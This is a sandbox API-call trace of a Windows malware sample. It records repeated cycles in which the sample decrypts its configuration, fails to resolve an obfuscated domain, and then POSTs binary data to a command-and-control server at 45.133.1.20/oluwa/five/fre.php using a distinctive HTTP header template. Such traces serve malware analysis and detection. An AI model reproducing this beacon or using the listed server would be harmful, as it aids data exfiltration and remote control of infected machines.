[0288.264] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.265] GetProcessHeap () returned 0x6a0000 [0288.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0288.266] GetProcessHeap () returned 0x6a0000 [0288.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0288.266] GetProcessHeap () returned 0x6a0000 [0288.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0288.267] GetProcessHeap () returned 0x6a0000 [0288.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0288.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.271] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0288.295] GetProcessHeap () returned 0x6a0000 [0288.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0288.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.299] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0288.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.301] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.302] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.302] GetProcessHeap () returned 0x6a0000 [0288.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0288.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.303] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0288.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.304] CryptDestroyKey (hKey=0x6ad020) returned 1 [0288.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.305] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0288.305] GetProcessHeap () returned 0x6a0000 [0288.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0288.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.306] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0288.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.307] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0288.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.308] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0288.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.309] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0288.309] GetProcessHeap () returned 0x6a0000 [0288.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0288.309] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0288.310] GetProcessHeap () returned 0x6a0000 [0288.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0288.310] socket (af=2, type=1, protocol=6) returned 0xaac [0288.310] connect (s=0xaac, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0288.344] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0288.344] GetProcessHeap () returned 0x6a0000 [0288.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0288.344] GetProcessHeap () returned 0x6a0000 [0288.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0288.345] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0288.346] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0288.346] GetProcessHeap () returned 0x6a0000 [0288.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d83b0 [0288.346] GetProcessHeap () returned 0x6a0000 [0288.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0288.347] GetProcessHeap () returned 0x6a0000 [0288.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0288.347] GetProcessHeap () returned 0x6a0000 [0288.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0288.348] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0288.349] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0288.349] GetProcessHeap () returned 0x6a0000 [0288.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0288.349] GetProcessHeap () returned 0x6a0000 [0288.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0288.350] send (s=0xaac, buf=0x6bd460*, len=242, flags=0) returned 242 [0288.351] send (s=0xaac, buf=0x6bb998*, len=159, flags=0) returned 159 [0288.351] GetProcessHeap () returned 0x6a0000 [0288.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0288.351] recv (in: s=0xaac, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0288.424] GetProcessHeap () returned 0x6a0000 [0288.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0288.424] GetProcessHeap () returned 0x6a0000 [0288.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0288.425] GetProcessHeap () returned 0x6a0000 [0288.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d83b0 | out: hHeap=0x6a0000) returned 1 [0288.426] GetProcessHeap () returned 0x6a0000 [0288.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0288.426] closesocket (s=0xaac) returned 0 [0288.427] GetProcessHeap () returned 0x6a0000 [0288.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0288.427] GetProcessHeap () returned 0x6a0000 [0288.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0288.428] GetProcessHeap () returned 0x6a0000 [0288.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0288.428] GetProcessHeap () returned 0x6a0000 [0288.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0288.429] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x66c) returned 0xaac [0288.431] Sleep (dwMilliseconds=0xea60) [0288.435] GetProcessHeap () returned 0x6a0000 [0288.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0288.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.437] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.445] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0288.453] GetProcessHeap () returned 0x6a0000 [0288.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0288.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.458] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0288.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.459] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.460] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.460] GetProcessHeap () returned 0x6a0000 [0288.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0288.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.462] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0288.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.498] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0288.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.499] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0288.499] GetProcessHeap () returned 0x6a0000 [0288.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0288.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.500] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.502] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.504] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.505] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.505] GetProcessHeap () returned 0x6a0000 [0288.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0288.505] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.506] GetProcessHeap () returned 0x6a0000 [0288.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0288.508] GetProcessHeap () returned 0x6a0000 [0288.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0288.509] GetProcessHeap () returned 0x6a0000 [0288.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0288.509] GetProcessHeap () returned 0x6a0000 [0288.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0288.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.513] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.530] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0288.539] GetProcessHeap () returned 0x6a0000 [0288.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0288.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.542] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0288.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.544] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.545] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.545] GetProcessHeap () returned 0x6a0000 [0288.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0288.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.547] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0288.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.548] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0288.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.549] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0288.549] GetProcessHeap () returned 0x6a0000 [0288.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0288.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.551] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0288.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.552] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0288.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.553] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0288.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.555] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0288.555] GetProcessHeap () returned 0x6a0000 [0288.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0288.555] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0288.555] GetProcessHeap () returned 0x6a0000 [0288.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0288.555] socket (af=2, type=1, protocol=6) returned 0xab0 [0288.556] connect (s=0xab0, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0288.584] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0288.585] GetProcessHeap () returned 0x6a0000 [0288.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0288.585] GetProcessHeap () returned 0x6a0000 [0288.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0288.586] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0288.587] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0288.587] GetProcessHeap () returned 0x6a0000 [0288.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d80b0 [0288.587] GetProcessHeap () returned 0x6a0000 [0288.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0288.588] GetProcessHeap () returned 0x6a0000 [0288.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0288.588] GetProcessHeap () returned 0x6a0000 [0288.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0288.589] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0288.590] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0288.590] GetProcessHeap () returned 0x6a0000 [0288.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0288.590] GetProcessHeap () returned 0x6a0000 [0288.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0288.590] send (s=0xab0, buf=0x6bd460*, len=242, flags=0) returned 242 [0288.591] send (s=0xab0, buf=0x6bb998*, len=159, flags=0) returned 159 [0288.591] GetProcessHeap () returned 0x6a0000 [0288.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0288.592] recv (in: s=0xab0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0288.666] GetProcessHeap () returned 0x6a0000 [0288.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0288.668] GetProcessHeap () returned 0x6a0000 [0288.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0288.668] GetProcessHeap () returned 0x6a0000 [0288.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d80b0 | out: hHeap=0x6a0000) returned 1 [0288.669] GetProcessHeap () returned 0x6a0000 [0288.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0288.671] closesocket (s=0xab0) returned 0 [0288.672] GetProcessHeap () returned 0x6a0000 [0288.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0288.672] GetProcessHeap () returned 0x6a0000 [0288.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0288.673] GetProcessHeap () returned 0x6a0000 [0288.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0288.674] GetProcessHeap () returned 0x6a0000 [0288.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0288.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfc0) returned 0xab0 [0288.681] Sleep (dwMilliseconds=0xea60) [0288.682] GetProcessHeap () returned 0x6a0000 [0288.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0288.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.686] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0288.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.720] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0288.745] GetProcessHeap () returned 0x6a0000 [0288.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0288.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.746] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0288.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.748] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0288.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.757] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0288.757] GetProcessHeap () returned 0x6a0000 [0288.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0288.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.765] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0288.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.768] CryptDestroyKey (hKey=0x6ad020) returned 1 [0288.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0288.769] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0288.769] GetProcessHeap () returned 0x6a0000 [0288.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0288.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.780] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0288.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.781] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0288.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.783] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0288.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.784] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0288.784] GetProcessHeap () returned 0x6a0000 [0288.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0288.784] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0288.785] GetProcessHeap () returned 0x6a0000 [0288.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0288.785] GetProcessHeap () returned 0x6a0000 [0288.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0288.786] GetProcessHeap () returned 0x6a0000 [0288.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0288.786] 